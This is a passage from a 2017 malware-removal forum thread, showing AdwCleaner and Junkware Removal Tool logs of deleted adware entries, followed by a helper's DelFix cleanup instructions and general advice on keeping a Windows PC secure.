Deleted: C:\ProgramData\51567d01-ec85-413b-811c-94ed81f27e25
Deleted: C:\ProgramData\ad714959-89cb-442d-95c9-972d76222811
 
 
***** [ Files ] *****
 
Deleted: C:\END
 
 
***** [ DLL ] *****
 
No malicious DLLs cleaned.
 
***** [ WMI ] *****
 
No malicious WMI cleaned.
 
***** [ Shortcuts ] *****
 
No malicious shortcuts cleaned.
 
***** [ Tasks ] *****
 
Deleted: ASC10_PerformanceMonitor
Deleted: Driver Booster Scheduler
 
 
***** [ Registry ] *****
 
Deleted: [Key] - HKLM\SOFTWARE\IOBIT\ASC
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\DIRECTORY\SHELLEX\CONTEXTMENUHANDLERS\Advanced SystemCare
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\DRIVE\SHELLEX\CONTEXTMENUHANDLERS\Advanced SystemCare
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\LNKFILE\SHELLEX\CONTEXTMENUHANDLERS\Advanced SystemCare
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\chatango.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\st.chatango.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\st.chatango.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ttdetect.staticimgfarm.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\videodownloadconverter.dl.tb.ask.com
Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{54F82A2A-DB25-466E-8663-FE145DC48A47}
Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{F000EE94-3781-4402-BB3F-DE5085B0578C}
Deleted: [Key] - HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
Deleted: [Key] - HKLM\SOFTWARE\SlimWare Utilities Inc
Deleted: [Key] - HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\SlimWare Utilities Inc
Deleted: [Key] - HKCU\Software\SlimWare Utilities Inc
Deleted: [Key] - HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKU\S-1-5-18\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Advanced SystemCare_is1
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\952BA647474611149866C1269F6A0E36
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Features\952BA647474611149866C1269F6A0E36
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Products\952BA647474611149866C1269F6A0E36
Deleted: [Value] - HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Advanced SystemCare 10
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASC10_SkipUac_Hercílio
 
 
***** [ Firefox (and derivatives) ] *****
 
No malicious Firefox entries deleted.
 
***** [ Chromium (and derivatives) ] *****
 
No malicious Chromium entries deleted.
 
*************************
 
::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0
 
 
 
*************************
 
C:/AdwCleaner/AdwCleaner[S0].txt - [6333 B] - [2017/8/4 13:4:37]
 
 
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########
 
Here is the JRT log:
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home Single Language x64 
Ran by Herc¡lio (Administrator) on 04/08/2017 at 10:14:15,20
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 11 
 
Successfully deleted: C:\ProgramData\ingiamckmcfijbpcaanbbnkmplbbegcl (Folder) 
Successfully deleted: C:\ProgramData\productdata (Folder) 
Successfully deleted: C:\Users\Herc¡lio\AppData\Roaming\3909 (Folder) 
Successfully deleted: C:\Users\Herc¡lio\AppData\Roaming\Mozilla\Firefox\Profiles\1yl2b5e1.default\user.js (File) 
Successfully deleted: C:\WINDOWS\system32\Tasks\Driver Booster SkipUAC (Herc¡lio) (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDEventLauncherTask (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDoctorBackgroundMonitorTask-Delay (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDoctorBackgroundMonitorTask (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\SmartDefrag_Startup (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_SkipUac_Herc¡lio (Task)
Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Herc¡lio.job (Task) 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 04/08/2017 at 10:18:02,34
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 


#13 Aura


Posted 04 August 2017 - 09:16 AM

Good :) How's your system behaving now? Are there any other issues to address?



#14 Hercilio


Posted 04 August 2017 - 09:31 AM

It's doing just fine! I appreciate the help Aura. Everything was quick and easy to understand. 

 

Have a nice day good sir!



#15 Aura


Posted 04 August 2017 - 09:35 AM

Good, thank you for letting me know!
Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

DelFix
Follow the instructions below to download and execute DelFix.
  • Download DelFix and move the executable to your Desktop;
  • Right-click on DelFix.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Check the following options :
    • Activate UAC;
    • Remove disinfection tools;
    • Create registry backup;
    • Purge system restore;
    • Reset system settings;
  • Once all the options mentioned above are checked, click on Run;
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply;

Tips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it that makes it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.

Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits (and also 0-days) which is one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, Google Chrome, Mozilla Firefox, VLC Media Player, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like SecuniaPSI and Heimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.

Anti-Virus, Anti-Malware, Firewall and Anti-Exploit/Ransomware

Having a decent security setup (which also includes an Anti-Virus) is the most crucial step to protect a system. These programs are a layer of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Ideally, you should have on your system one Antivirus (never more than one installed at the time), one Antimalware (you can install multiple of these, assuming they do not conflict with each other and the other security programs installed), one Firewall and if you wish, one Anti-Exploit and/or Anti-Ransomware (since Ransomware are currently the most dangerous threat around and it can hit anywhere). Here are a few programs worth checking out if you don't have one yet.

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).

Anti-Virus

Anti-Malware
  • Malwarebytes - Has both a free and paid version. The Premium version of Malwarebytes also offers Exploit and Ransomware protection, for a complete package of: Malware, Web, Exploit and Ransomware protection
  • HitmanPro 3 - Free 30 day trial
  • Zemana AntiMalware - Free 30 day trial
Firewall
Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.
  • GlassWire - Has both a free and paid version (with different packages)
  • Windows Firewall Control - Gives you more control over your Windows Firewall
  • TinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it
Anti-Exploit/Anti-Ransomware

Web Browsers and Web Browsing

Web Browsers could be considered as the closest door between a malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means to install extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc. but also you at the same time. Here are a few extensions that I recommend you install.
  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome, Mozilla Firefox, Microsoft Edge, Opera and most Chromium and Firefox-based browsers)
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera)
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browser)
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers)
  • uMatrix: For advanced users, a point and click matrix-like extension that allows you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera)
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser)
As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:

As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far fewer chances to get infected by a malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices:

The End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you won't!), you can always come back in this section to get another checkup with one of our trained malware removal members.

Do you have any questions before I close this thread? :)
